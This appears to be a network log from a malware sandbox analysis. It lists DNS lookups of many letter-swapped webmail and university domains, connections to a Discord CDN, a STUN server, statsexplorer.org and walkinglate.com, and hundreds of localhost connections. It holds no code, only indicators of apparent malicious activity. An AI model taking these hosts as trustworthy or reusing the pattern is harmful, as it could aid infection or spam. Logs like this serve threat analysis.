US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 dmbvbluevbcbjoezs.cem udp
US 8.8.8.8:53 dmbvbluevbcbjoezs.cem udp
US 8.8.8.8:53 geeglejrbvel.cem.pk udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 cbrobsurf.cem udp
US 8.8.8.8:53 love.cem udp
US 8.8.8.8:53 cbrobsurf.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 love.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 gmbol.ce udp
US 8.8.8.8:53 gmbol.ce udp
US 8.8.8.8:53 geeglejrbvel.cem.pk udp
US 8.8.8.8:53 mee-dl.edu.my udp
US 8.8.8.8:53 mee-dl.edu.my udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 bkjbs.cem udp
US 8.8.8.8:53 love.cem udp
US 8.8.8.8:53 bkjbs.cem udp
US 8.8.8.8:53 bluze.ezevb.educbcbe.bb.gev.br udp
US 8.8.8.8:53 bluze.ezevb.educbcbe.bb.gev.br udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 ybhee.oj udp
US 8.8.8.8:53 ybhee.oj udp
US 8.8.8.8:53 mee.be udp
US 8.8.8.8:53 yee.erg.jr udp
US 8.8.8.8:53 mee.be udp
US 8.8.8.8:53 ocleud.cem udp
US 8.8.8.8:53 ocleud.cem udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 ybhee.cem udp
US 8.8.8.8:53 eujleek.cem udp
US 8.8.8.8:53 dezgguk.bc.kr udp
US 8.8.8.8:53 dezgguk.bc.kr udp
US 8.8.8.8:53 hejmbol.cem udp
US 8.8.8.8:53 geeglejrbvel.cem.pk udp
US 8.8.8.8:53 bbu.edu.bd udp
US 8.8.8.8:53 bbu.edu.bd udp
US 8.8.8.8:53 dgu.bc.kr udp
US 8.8.8.8:53 dgu.bc.kr udp
US 8.8.8.8:53 sedmb-eszevzb.edu.bb udp
US 8.8.8.8:53 eolzews.cem udp
US 8.8.8.8:53 eolzews.cem udp
US 8.8.8.8:53 hexds.cem udp
US 8.8.8.8:53 hexds.cem udp
US 8.8.8.8:53 zezod.cem udp
US 8.8.8.8:53 zezod.cem udp
US 8.8.8.8:53 kbfjee.cem udp
US 8.8.8.8:53 kbfjee.cem udp
US 8.8.8.8:53 bblkbz-scheel.cem udp
US 8.8.8.8:53 qubmex.cem udp
US 8.8.8.8:53 je6s.cem udp
US 8.8.8.8:53 je6s.cem udp
US 8.8.8.8:53 qubmex.cem udp
US 8.8.8.8:53 kurubpp.cem udp
US 8.8.8.8:53 kurubpp.cem udp
US 8.8.8.8:53 love.cem udp
US 8.8.8.8:53 embolbex.fuz udp
US 8.8.8.8:53 love.cem udp
US 8.8.8.8:53 vbsqb.cem udp
US 8.8.8.8:53 vbsqb.cem udp
US 8.8.8.8:53 ebsebre.cem udp
US 8.8.8.8:53 ebsebre.cem udp
US 8.8.8.8:53 jelefezocb.cem udp
US 8.8.8.8:53 esmbklj.edu.bb udp
US 8.8.8.8:53 skelers.erg udp
US 8.8.8.8:53 cps.sp.gev.br udp
US 8.8.8.8:53 sozhgbd.edu udp
US 8.8.8.8:53 www.sozhgbd.edu udp
US 8.8.8.8:53 jbblom.mb udp
US 8.8.8.8:53 ybhee.fr udp
US 8.8.8.8:53 loder.soedlce.pl udp
US 8.8.8.8:53 gmbol.ceem udp
US 8.8.8.8:53 gmbol.ce udp
US 8.8.8.8:53 gmbol.cempr udp
US 8.8.8.8:53 dmbvbluevbcbjoezs.cem udp
US 8.8.8.8:53 cbrobsurf.cem udp
US 8.8.8.8:53 mee-dl.edu.my udp
KR 211.181.24.132:80 sjyey.com tcp
US 8.8.8.8:53 bkjbs.cem udp
US 8.8.8.8:53 bluze.ezevb.educbcbe.bb.gev.br udp
US 8.8.8.8:53 105.246.116.51.in-addr.arpa udp
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 server2.statsexplorer.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.sipgate.net udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 3.33.249.248:3478 stun.sipgate.net udp
BG 185.82.216.108:443 server2.statsexplorer.org tcp
US 8.8.8.8:53 walkinglate.com udp
US 172.67.212.188:443 walkinglate.com tcp
US 8.8.8.8:53 248.249.33.3.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 108.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 188.212.67.172.in-addr.arpa udp
BG 185.82.216.108:443 server2.statsexplorer.org tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:51974 tcp
N/A 127.0.0.1:51978 tcp
N/A 127.0.0.1:51983 tcp
N/A 127.0.0.1:51988 tcp
N/A 127.0.0.1:51991 tcp
N/A 127.0.0.1:51996 tcp
N/A 127.0.0.1:52010 tcp
N/A 127.0.0.1:52012 tcp
N/A 127.0.0.1:52014 tcp
N/A 127.0.0.1:52016 tcp
N/A 127.0.0.1:52018 tcp
N/A 127.0.0.1:52021 tcp
N/A 127.0.0.1:52024 tcp
N/A 127.0.0.1:52027 tcp
N/A 127.0.0.1:52038 tcp
N/A 127.0.0.1:52041 tcp
N/A 127.0.0.1:52045 tcp
N/A 127.0.0.1:52048 tcp
N/A 127.0.0.1:52051 tcp
N/A 127.0.0.1:52056 tcp
N/A 127.0.0.1:52059 tcp
N/A 127.0.0.1:52063 tcp
N/A 127.0.0.1:52069 tcp
N/A 127.0.0.1:52074 tcp
N/A 127.0.0.1:52077 tcp
N/A 127.0.0.1:52081 tcp
N/A 127.0.0.1:52084 tcp
N/A 127.0.0.1:52087 tcp
N/A 127.0.0.1:52089 tcp
N/A 127.0.0.1:52093 tcp
N/A 127.0.0.1:52097 tcp
N/A 127.0.0.1:52103 tcp
N/A 127.0.0.1:52105 tcp
N/A 127.0.0.1:52107 tcp
N/A 127.0.0.1:52111 tcp
N/A 127.0.0.1:52122 tcp
N/A 127.0.0.1:52127 tcp
N/A 127.0.0.1:52130 tcp
N/A 127.0.0.1:52139 tcp
N/A 127.0.0.1:52141 tcp
N/A 127.0.0.1:52146 tcp
N/A 127.0.0.1:52151 tcp
N/A 127.0.0.1:52154 tcp
N/A 127.0.0.1:52156 tcp
N/A 127.0.0.1:52158 tcp
N/A 127.0.0.1:52162 tcp
N/A 127.0.0.1:52165 tcp
N/A 127.0.0.1:52168 tcp
N/A 127.0.0.1:52173 tcp
N/A 127.0.0.1:52175 tcp
N/A 127.0.0.1:52178 tcp
N/A 127.0.0.1:52184 tcp
N/A 127.0.0.1:52189 tcp
N/A 127.0.0.1:52192 tcp
N/A 127.0.0.1:52199 tcp
N/A 127.0.0.1:52202 tcp
N/A 127.0.0.1:52205 tcp
N/A 127.0.0.1:52212 tcp
N/A 127.0.0.1:52215 tcp
N/A 127.0.0.1:52218 tcp
N/A 127.0.0.1:52221 tcp
N/A 127.0.0.1:52224 tcp
N/A 127.0.0.1:52227 tcp
N/A 127.0.0.1:52233 tcp
N/A 127.0.0.1:52236 tcp
N/A 127.0.0.1:52239 tcp
N/A 127.0.0.1:52247 tcp
N/A 127.0.0.1:52250 tcp
N/A 127.0.0.1:52255 tcp
N/A 127.0.0.1:52260 tcp
N/A 127.0.0.1:52262 tcp
N/A 127.0.0.1:52266 tcp
N/A 127.0.0.1:52275 tcp
N/A 127.0.0.1:52278 tcp
N/A 127.0.0.1:52281 tcp
N/A 127.0.0.1:52285 tcp
N/A 127.0.0.1:52289 tcp
N/A 127.0.0.1:52298 tcp
N/A 127.0.0.1:52302 tcp
N/A 127.0.0.1:52306 tcp
N/A 127.0.0.1:52310 tcp
N/A 127.0.0.1:52313 tcp
N/A 127.0.0.1:52316 tcp
N/A 127.0.0.1:52321 tcp
N/A 127.0.0.1:52326 tcp
N/A 127.0.0.1:52330 tcp
N/A 127.0.0.1:52332 tcp
N/A 127.0.0.1:52338 tcp
N/A 127.0.0.1:52340 tcp
N/A 127.0.0.1:52345 tcp
N/A 127.0.0.1:52350 tcp
N/A 127.0.0.1:52353 tcp
N/A 127.0.0.1:52358 tcp
N/A 127.0.0.1:52365 tcp
N/A 127.0.0.1:52368 tcp
N/A 127.0.0.1:52373 tcp
N/A 127.0.0.1:52379 tcp
N/A 127.0.0.1:52382 tcp
N/A 127.0.0.1:52385 tcp
N/A 127.0.0.1:52389 tcp
N/A 127.0.0.1:52393 tcp
N/A 127.0.0.1:52398 tcp
N/A 127.0.0.1:52402 tcp
N/A 127.0.0.1:52405 tcp
N/A 127.0.0.1:52407 tcp
N/A 127.0.0.1:52410 tcp
N/A 127.0.0.1:52413 tcp
N/A 127.0.0.1:52418 tcp
N/A 127.0.0.1:52422 tcp
N/A 127.0.0.1:52428 tcp
N/A 127.0.0.1:52432 tcp
N/A 127.0.0.1:52439 tcp
N/A 127.0.0.1:52441 tcp
N/A 127.0.0.1:52446 tcp
N/A 127.0.0.1:52449 tcp
N/A 127.0.0.1:52454 tcp
N/A 127.0.0.1:52459 tcp
N/A 127.0.0.1:52462 tcp
N/A 127.0.0.1:52471 tcp
N/A 127.0.0.1:52474 tcp
N/A 127.0.0.1:52480 tcp
N/A 127.0.0.1:52482 tcp
N/A 127.0.0.1:52484 tcp
N/A 127.0.0.1:52488 tcp
N/A 127.0.0.1:52491 tcp
N/A 127.0.0.1:52500 tcp
N/A 127.0.0.1:52504 tcp
N/A 127.0.0.1:52506 tcp
N/A 127.0.0.1:52509 tcp
N/A 127.0.0.1:52514 tcp
N/A 127.0.0.1:52520 tcp
N/A 127.0.0.1:52522 tcp
N/A 127.0.0.1:52525 tcp
N/A 127.0.0.1:52535 tcp
N/A 127.0.0.1:52537 tcp
N/A 127.0.0.1:52541 tcp
N/A 127.0.0.1:52546 tcp
N/A 127.0.0.1:52551 tcp
N/A 127.0.0.1:52556 tcp
N/A 127.0.0.1:52558 tcp
N/A 127.0.0.1:52560 tcp
N/A 127.0.0.1:52563 tcp
N/A 127.0.0.1:52569 tcp
N/A 127.0.0.1:52573 tcp
N/A 127.0.0.1:52579 tcp
N/A 127.0.0.1:52580 tcp
N/A 127.0.0.1:52584 tcp
N/A 127.0.0.1:52588 tcp
N/A 127.0.0.1:52596 tcp
N/A 127.0.0.1:52598 tcp
N/A 127.0.0.1:52604 tcp
N/A 127.0.0.1:52608 tcp
N/A 127.0.0.1:52612 tcp
N/A 127.0.0.1:52617 tcp
N/A 127.0.0.1:52619 tcp
N/A 127.0.0.1:52626 tcp
N/A 127.0.0.1:52628 tcp
N/A 127.0.0.1:52632 tcp
N/A 127.0.0.1:52643 tcp
N/A 127.0.0.1:52647 tcp
N/A 127.0.0.1:52651 tcp
N/A 127.0.0.1:52655 tcp
N/A 127.0.0.1:52659 tcp
N/A 127.0.0.1:52661 tcp
N/A 127.0.0.1:52664 tcp
N/A 127.0.0.1:52674 tcp
N/A 127.0.0.1:52680 tcp
N/A 127.0.0.1:52682 tcp
N/A 127.0.0.1:52685 tcp
N/A 127.0.0.1:52692 tcp
N/A 127.0.0.1:52694 tcp
N/A 127.0.0.1:52697 tcp
N/A 127.0.0.1:52702 tcp
N/A 127.0.0.1:52705 tcp
N/A 127.0.0.1:52709 tcp
N/A 127.0.0.1:52718 tcp
N/A 127.0.0.1:52721 tcp
N/A 127.0.0.1:52725 tcp
N/A 127.0.0.1:52727 tcp
N/A 127.0.0.1:52732 tcp
N/A 127.0.0.1:52736 tcp
N/A 127.0.0.1:52739 tcp
N/A 127.0.0.1:52744 tcp
N/A 127.0.0.1:52747 tcp
N/A 127.0.0.1:52753 tcp
N/A 127.0.0.1:52762 tcp
N/A 127.0.0.1:52764 tcp
N/A 127.0.0.1:52768 tcp
N/A 127.0.0.1:52775 tcp
N/A 127.0.0.1:52777 tcp
N/A 127.0.0.1:52780 tcp
N/A 127.0.0.1:52783 tcp
N/A 127.0.0.1:52787 tcp
N/A 127.0.0.1:52793 tcp
N/A 127.0.0.1:52800 tcp
N/A 127.0.0.1:52804 tcp
N/A 127.0.0.1:52807 tcp
N/A 127.0.0.1:52814 tcp
N/A 127.0.0.1:52818 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:52822 tcp
N/A 127.0.0.1:52825 tcp
N/A 127.0.0.1:52832 tcp
N/A 127.0.0.1:52836 tcp
N/A 127.0.0.1:52840 tcp
N/A 127.0.0.1:52848 tcp
N/A 127.0.0.1:52852 tcp
N/A 127.0.0.1:52854 tcp
N/A 127.0.0.1:52858 tcp
N/A 127.0.0.1:52867 tcp
N/A 127.0.0.1:52871 tcp
N/A 127.0.0.1:52875 tcp
N/A 127.0.0.1:52881 tcp
N/A 127.0.0.1:52883 tcp
N/A 127.0.0.1:52886 tcp
N/A 127.0.0.1:52888 tcp
N/A 127.0.0.1:52892 tcp
N/A 127.0.0.1:52895 tcp
N/A 127.0.0.1:52900 tcp
N/A 127.0.0.1:52904 tcp
N/A 127.0.0.1:52908 tcp
N/A 127.0.0.1:52912 tcp
N/A 127.0.0.1:52915 tcp
N/A 127.0.0.1:52920 tcp
N/A 127.0.0.1:52922 tcp
N/A 127.0.0.1:52932 tcp
N/A 127.0.0.1:52936 tcp
N/A 127.0.0.1:52940 tcp
N/A 127.0.0.1:52944 tcp
N/A 127.0.0.1:52948 tcp
N/A 127.0.0.1:52954 tcp
N/A 127.0.0.1:52957 tcp
N/A 127.0.0.1:52961 tcp
N/A 127.0.0.1:52964 tcp
N/A 127.0.0.1:52973 tcp
N/A 127.0.0.1:52975 tcp
N/A 127.0.0.1:52979 tcp
N/A 127.0.0.1:52984 tcp
N/A 127.0.0.1:52988 tcp
N/A 127.0.0.1:52992 tcp
N/A 127.0.0.1:52995 tcp
N/A 127.0.0.1:52999 tcp
N/A 127.0.0.1:53002 tcp
N/A 127.0.0.1:53009 tcp
N/A 127.0.0.1:53013 tcp
N/A 127.0.0.1:53021 tcp
N/A 127.0.0.1:53024 tcp
N/A 127.0.0.1:53026 tcp
N/A 127.0.0.1:53032 tcp
N/A 127.0.0.1:53037 tcp
N/A 127.0.0.1:53043 tcp
N/A 127.0.0.1:53046 tcp
N/A 127.0.0.1:53049 tcp
N/A 127.0.0.1:53053 tcp
N/A 127.0.0.1:53057 tcp
N/A 127.0.0.1:53063 tcp
N/A 127.0.0.1:53065 tcp
N/A 127.0.0.1:53069 tcp
N/A 127.0.0.1:53073 tcp
N/A 127.0.0.1:53075 tcp
N/A 127.0.0.1:53081 tcp
N/A 127.0.0.1:53084 tcp
N/A 127.0.0.1:53087 tcp
N/A 127.0.0.1:53091 tcp
N/A 127.0.0.1:53096 tcp
N/A 127.0.0.1:53099 tcp
N/A 127.0.0.1:53104 tcp
N/A 127.0.0.1:53110 tcp
N/A 127.0.0.1:53115 tcp
N/A 127.0.0.1:53117 tcp
N/A 127.0.0.1:53120 tcp
N/A 127.0.0.1:53126 tcp
N/A 127.0.0.1:53131 tcp
N/A 127.0.0.1:53134 tcp
N/A 127.0.0.1:53137 tcp
N/A 127.0.0.1:53147 tcp
N/A 127.0.0.1:53150 tcp
N/A 127.0.0.1:53154 tcp
N/A 127.0.0.1:53159 tcp
N/A 127.0.0.1:53161 tcp
N/A 127.0.0.1:53165 tcp
N/A 127.0.0.1:53168 tcp
N/A 127.0.0.1:53172 tcp
N/A 127.0.0.1:53175 tcp
N/A 127.0.0.1:53181 tcp
N/A 127.0.0.1:53186 tcp
N/A 127.0.0.1:53188 tcp
N/A 127.0.0.1:53191 tcp
N/A 127.0.0.1:53197 tcp
N/A 127.0.0.1:53202 tcp
N/A 127.0.0.1:53209 tcp
N/A 127.0.0.1:53214 tcp
N/A 127.0.0.1:53217 tcp
N/A 127.0.0.1:53221 tcp
N/A 127.0.0.1:53224 tcp
N/A 127.0.0.1:53226 tcp
N/A 127.0.0.1:53229 tcp
N/A 127.0.0.1:53233 tcp
N/A 127.0.0.1:53236 tcp
N/A 127.0.0.1:53242 tcp
N/A 127.0.0.1:53246 tcp
N/A 127.0.0.1:53250 tcp
N/A 127.0.0.1:53254 tcp
N/A 127.0.0.1:53259 tcp
N/A 127.0.0.1:53264 tcp
N/A 127.0.0.1:53267 tcp
N/A 127.0.0.1:53271 tcp
N/A 127.0.0.1:53280 tcp
N/A 127.0.0.1:53285 tcp
N/A 127.0.0.1:53291 tcp
N/A 127.0.0.1:53295 tcp
N/A 127.0.0.1:53297 tcp
N/A 127.0.0.1:53300 tcp
N/A 127.0.0.1:53303 tcp
N/A 127.0.0.1:53310 tcp
N/A 127.0.0.1:53311 tcp
N/A 127.0.0.1:53316 tcp
N/A 127.0.0.1:53321 tcp
N/A 127.0.0.1:53324 tcp
N/A 127.0.0.1:53327 tcp
N/A 127.0.0.1:53333 tcp
N/A 127.0.0.1:53337 tcp
N/A 127.0.0.1:53343 tcp
N/A 127.0.0.1:53345 tcp
N/A 127.0.0.1:53349 tcp
N/A 127.0.0.1:53354 tcp
N/A 127.0.0.1:53360 tcp
N/A 127.0.0.1:53363 tcp
N/A 127.0.0.1:53367 tcp
N/A 127.0.0.1:53371 tcp
N/A 127.0.0.1:53375 tcp
N/A 127.0.0.1:53380 tcp
N/A 127.0.0.1:53383 tcp
N/A 127.0.0.1:53385 tcp
N/A 127.0.0.1:53393 tcp
N/A 127.0.0.1:53396 tcp
N/A 127.0.0.1:53407 tcp
N/A 127.0.0.1:53409 tcp
N/A 127.0.0.1:53411 tcp
N/A 127.0.0.1:53415 tcp
N/A 127.0.0.1:53424 tcp
N/A 127.0.0.1:53429 tcp
N/A 127.0.0.1:53433 tcp
N/A 127.0.0.1:53435 tcp
N/A 127.0.0.1:53437 tcp
N/A 127.0.0.1:53439 tcp
N/A 127.0.0.1:53442 tcp
N/A 127.0.0.1:53446 tcp
N/A 127.0.0.1:53450 tcp
N/A 127.0.0.1:53460 tcp
N/A 127.0.0.1:53464 tcp
N/A 127.0.0.1:53467 tcp
N/A 127.0.0.1:53474 tcp
N/A 127.0.0.1:53476 tcp
N/A 127.0.0.1:53480 tcp
N/A 127.0.0.1:53483 tcp
N/A 127.0.0.1:53486 tcp
N/A 127.0.0.1:53489 tcp
N/A 127.0.0.1:53493 tcp
N/A 127.0.0.1:53499 tcp
N/A 127.0.0.1:53502 tcp
N/A 127.0.0.1:53507 tcp
N/A 127.0.0.1:53510 tcp
N/A 127.0.0.1:53513 tcp
N/A 127.0.0.1:53516 tcp
N/A 127.0.0.1:53522 tcp
N/A 127.0.0.1:53530 tcp
N/A 127.0.0.1:53533 tcp
N/A 127.0.0.1:53539 tcp
N/A 127.0.0.1:53542 tcp
N/A 127.0.0.1:53545 tcp
N/A 127.0.0.1:53549 tcp
N/A 127.0.0.1:53551 tcp
N/A 127.0.0.1:53555 tcp
N/A 127.0.0.1:53564 tcp
N/A 127.0.0.1:53568 tcp
N/A 127.0.0.1:53571 tcp
N/A 127.0.0.1:53574 tcp
N/A 127.0.0.1:53579 tcp
N/A 127.0.0.1:53584 tcp
N/A 127.0.0.1:53587 tcp
N/A 127.0.0.1:53592 tcp
N/A 127.0.0.1:53594 tcp
N/A 127.0.0.1:53597 tcp
N/A 127.0.0.1:53601 tcp
N/A 127.0.0.1:53606 tcp
N/A 127.0.0.1:53613 tcp
N/A 127.0.0.1:53615 tcp
N/A 127.0.0.1:53619 tcp
N/A 127.0.0.1:53623 tcp
N/A 127.0.0.1:53629 tcp
N/A 127.0.0.1:53632 tcp
N/A 127.0.0.1:53638 tcp
N/A 127.0.0.1:53646 tcp
N/A 127.0.0.1:53648 tcp
N/A 127.0.0.1:53650 tcp
N/A 127.0.0.1:53652 tcp
N/A 127.0.0.1:53656 tcp
N/A 127.0.0.1:53662 tcp
N/A 127.0.0.1:53669 tcp
N/A 127.0.0.1:53671 tcp
N/A 127.0.0.1:53674 tcp
N/A 127.0.0.1:53681 tcp
N/A 127.0.0.1:53687 tcp
N/A 127.0.0.1:53689 tcp
N/A 127.0.0.1:53691 tcp
N/A 127.0.0.1:53697 tcp
N/A 127.0.0.1:53700 tcp
N/A 127.0.0.1:53703 tcp
N/A 127.0.0.1:53708 tcp
N/A 127.0.0.1:53710 tcp
N/A 127.0.0.1:53713 tcp
N/A 127.0.0.1:53721 tcp
N/A 127.0.0.1:53726 tcp
N/A 127.0.0.1:53729 tcp
N/A 127.0.0.1:53732 tcp
N/A 127.0.0.1:53737 tcp
N/A 127.0.0.1:53743 tcp
N/A 127.0.0.1:53746 tcp
N/A 127.0.0.1:53750 tcp
N/A 127.0.0.1:53756 tcp
N/A 127.0.0.1:53759 tcp
N/A 127.0.0.1:53764 tcp
N/A 127.0.0.1:53766 tcp
N/A 127.0.0.1:53770 tcp
N/A 127.0.0.1:53773 tcp
N/A 127.0.0.1:41152 tcp
N/A 127.0.0.1:53779 tcp
N/A 127.0.0.1:53783 tcp
N/A 127.0.0.1:53787 tcp
N/A 127.0.0.1:53792 tcp
N/A 127.0.0.1:53794 tcp
N/A 127.0.0.1:53796 tcp
N/A 127.0.0.1:53805 tcp
N/A 127.0.0.1:53809 tcp
N/A 127.0.0.1:53814 tcp
N/A 127.0.0.1:53817 tcp
N/A 127.0.0.1:53820 tcp
N/A 127.0.0.1:53827 tcp
N/A 127.0.0.1:53831 tcp
N/A 127.0.0.1:53833 tcp
N/A 127.0.0.1:53839 tcp
N/A 127.0.0.1:53841 tcp
N/A 127.0.0.1:53844 tcp
N/A 127.0.0.1:53852 tcp
N/A 127.0.0.1:53859 tcp
N/A 127.0.0.1:53862 tcp
N/A 127.0.0.1:53864 tcp
N/A 127.0.0.1:53869 tcp
N/A 127.0.0.1:53874 tcp
N/A 127.0.0.1:53877 tcp
N/A 127.0.0.1:53881 tcp
N/A 127.0.0.1:53883 tcp
N/A 127.0.0.1:53891 tcp
N/A 127.0.0.1:53894 tcp
N/A 127.0.0.1:53897 tcp
N/A 127.0.0.1:53911 tcp
N/A 127.0.0.1:53915 tcp
N/A 127.0.0.1:53917 tcp
N/A 127.0.0.1:53927 tcp
N/A 127.0.0.1:53930 tcp
N/A 127.0.0.1:53936 tcp
N/A 127.0.0.1:53938 tcp
N/A 127.0.0.1:53943 tcp
N/A 127.0.0.1:53945 tcp
N/A 127.0.0.1:53949 tcp
N/A 127.0.0.1:53953 tcp
N/A 127.0.0.1:53958 tcp
N/A 127.0.0.1:53961 tcp
N/A 127.0.0.1:53966 tcp
N/A 127.0.0.1:53969 tcp
N/A 127.0.0.1:53971 tcp
N/A 127.0.0.1:53975 tcp
N/A 127.0.0.1:53981 tcp
N/A 127.0.0.1:53987 tcp
N/A 127.0.0.1:53990 tcp
N/A 127.0.0.1:53994 tcp
N/A 127.0.0.1:53997 tcp
N/A 127.0.0.1:54004 tcp
N/A 127.0.0.1:54010 tcp
N/A 127.0.0.1:54013 tcp
N/A 127.0.0.1:54022 tcp
N/A 127.0.0.1:54024 tcp
N/A 127.0.0.1:54028 tcp
N/A 127.0.0.1:54032 tcp
N/A 127.0.0.1:54035 tcp
N/A 127.0.0.1:54039 tcp
N/A 127.0.0.1:54042 tcp
N/A 127.0.0.1:54045 tcp
N/A 127.0.0.1:54050 tcp
N/A 127.0.0.1:54053 tcp
N/A 127.0.0.1:54059 tcp
N/A 127.0.0.1:54062 tcp
N/A 127.0.0.1:54067 tcp
N/A 127.0.0.1:54074 tcp
N/A 127.0.0.1:54081 tcp
N/A 127.0.0.1:54085 tcp
N/A 127.0.0.1:54087 tcp
N/A 127.0.0.1:54092 tcp
N/A 127.0.0.1:54094 tcp
N/A 127.0.0.1:54096 tcp
N/A 127.0.0.1:54099 tcp
N/A 127.0.0.1:54104 tcp
N/A 127.0.0.1:54107 tcp
N/A 127.0.0.1:54117 tcp
N/A 127.0.0.1:54121 tcp
N/A 127.0.0.1:54124 tcp
N/A 127.0.0.1:54130 tcp
N/A 127.0.0.1:54132 tcp
N/A 127.0.0.1:54137 tcp
N/A 127.0.0.1:54141 tcp
N/A 127.0.0.1:54143 tcp
N/A 127.0.0.1:54150 tcp
N/A 127.0.0.1:54153 tcp
N/A 127.0.0.1:54156 tcp
N/A 127.0.0.1:54160 tcp
N/A 127.0.0.1:54162 tcp
N/A 127.0.0.1:54164 tcp
N/A 127.0.0.1:54171 tcp
N/A 127.0.0.1:54178 tcp
N/A 127.0.0.1:54183 tcp
N/A 127.0.0.1:54187 tcp
N/A 127.0.0.1:54192 tcp
N/A 127.0.0.1:54195 tcp
N/A 127.0.0.1:54197 tcp
N/A 127.0.0.1:54200 tcp
N/A 127.0.0.1:54202 tcp
N/A 127.0.0.1:54207 tcp
N/A 127.0.0.1:54216 tcp
N/A 127.0.0.1:54221 tcp
N/A 127.0.0.1:54227 tcp
N/A 127.0.0.1:54232 tcp
N/A 127.0.0.1:54236 tcp
N/A 127.0.0.1:54239 tcp
N/A 127.0.0.1:54242 tcp
N/A 127.0.0.1:54247 tcp
N/A 127.0.0.1:54252 tcp
N/A 127.0.0.1:54257 tcp
N/A 127.0.0.1:54260 tcp
N/A 127.0.0.1:54262 tcp
N/A 127.0.0.1:54266 tcp
N/A 127.0.0.1:54268 tcp
N/A 127.0.0.1:54270 tcp
N/A 127.0.0.1:54274 tcp
N/A 127.0.0.1:54279 tcp
N/A 127.0.0.1:54284 tcp
N/A 127.0.0.1:54288 tcp
N/A 127.0.0.1:54293 tcp
N/A 127.0.0.1:54297 tcp
N/A 127.0.0.1:54301 tcp
N/A 127.0.0.1:54304 tcp
N/A 127.0.0.1:54312 tcp
N/A 127.0.0.1:54315 tcp
N/A 127.0.0.1:54317 tcp
N/A 127.0.0.1:54322 tcp
N/A 127.0.0.1:54325 tcp
N/A 127.0.0.1:54332 tcp
N/A 127.0.0.1:54335 tcp
N/A 127.0.0.1:54339 tcp
N/A 127.0.0.1:54341 tcp
N/A 127.0.0.1:54345 tcp
N/A 127.0.0.1:54355 tcp
N/A 127.0.0.1:54358 tcp
N/A 127.0.0.1:54363 tcp
N/A 127.0.0.1:54367 tcp
N/A 127.0.0.1:54369 tcp
N/A 127.0.0.1:54373 tcp
N/A 127.0.0.1:54375 tcp
N/A 127.0.0.1:54378 tcp
N/A 127.0.0.1:54384 tcp
N/A 127.0.0.1:54391 tcp
N/A 127.0.0.1:54394 tcp
N/A 127.0.0.1:54397 tcp
N/A 127.0.0.1:54405 tcp
N/A 127.0.0.1:54409 tcp
N/A 127.0.0.1:54413 tcp
N/A 127.0.0.1:54415 tcp
N/A 127.0.0.1:54418 tcp
N/A 127.0.0.1:54424 tcp
N/A 127.0.0.1:54428 tcp
N/A 127.0.0.1:54432 tcp
N/A 127.0.0.1:54436 tcp
N/A 127.0.0.1:54439 tcp
N/A 127.0.0.1:54445 tcp
N/A 127.0.0.1:54448 tcp
N/A 127.0.0.1:54453 tcp
N/A 127.0.0.1:54455 tcp
N/A 127.0.0.1:54459 tcp
N/A 127.0.0.1:54463 tcp
N/A 127.0.0.1:54468 tcp
N/A 127.0.0.1:54471 tcp
N/A 127.0.0.1:54476 tcp
N/A 127.0.0.1:54479 tcp
N/A 127.0.0.1:54482 tcp
N/A 127.0.0.1:54493 tcp
N/A 127.0.0.1:54497 tcp
N/A 127.0.0.1:54503 tcp
N/A 127.0.0.1:54505 tcp
N/A 127.0.0.1:54510 tcp
N/A 127.0.0.1:54512 tcp
N/A 127.0.0.1:54514 tcp
N/A 127.0.0.1:54519 tcp
N/A 127.0.0.1:54523 tcp
N/A 127.0.0.1:54526 tcp
N/A 127.0.0.1:54531 tcp
N/A 127.0.0.1:54533 tcp
N/A 127.0.0.1:54538 tcp
N/A 127.0.0.1:54545 tcp
N/A 127.0.0.1:54550 tcp
N/A 127.0.0.1:54554 tcp
N/A 127.0.0.1:54557 tcp
N/A 127.0.0.1:54560 tcp
N/A 127.0.0.1:54563 tcp
N/A 127.0.0.1:54574 tcp
N/A 127.0.0.1:54578 tcp
N/A 127.0.0.1:54582 tcp
N/A 127.0.0.1:54587 tcp
N/A 127.0.0.1:54589 tcp
N/A 127.0.0.1:54592 tcp
N/A 127.0.0.1:54595 tcp
N/A 127.0.0.1:54599 tcp
N/A 127.0.0.1:54603 tcp
N/A 127.0.0.1:54607 tcp
N/A 127.0.0.1:54611 tcp
N/A 127.0.0.1:54615 tcp
N/A 127.0.0.1:54618 tcp
N/A 127.0.0.1:54622 tcp
N/A 127.0.0.1:54626 tcp
N/A 127.0.0.1:54632 tcp
N/A 127.0.0.1:54636 tcp
N/A 127.0.0.1:54639 tcp
N/A 127.0.0.1:54643 tcp
N/A 127.0.0.1:54652 tcp
N/A 127.0.0.1:54655 tcp
N/A 127.0.0.1:54658 tcp
N/A 127.0.0.1:54661 tcp
N/A 127.0.0.1:54665 tcp
N/A 127.0.0.1:54669 tcp
N/A 127.0.0.1:54671 tcp
N/A 127.0.0.1:54675 tcp
N/A 127.0.0.1:54678 tcp
N/A 127.0.0.1:54683 tcp
N/A 127.0.0.1:54688 tcp
N/A 127.0.0.1:54690 tcp
N/A 127.0.0.1:54701 tcp
N/A 127.0.0.1:54710 tcp
N/A 127.0.0.1:54712 tcp
N/A 127.0.0.1:54715 tcp
N/A 127.0.0.1:54718 tcp
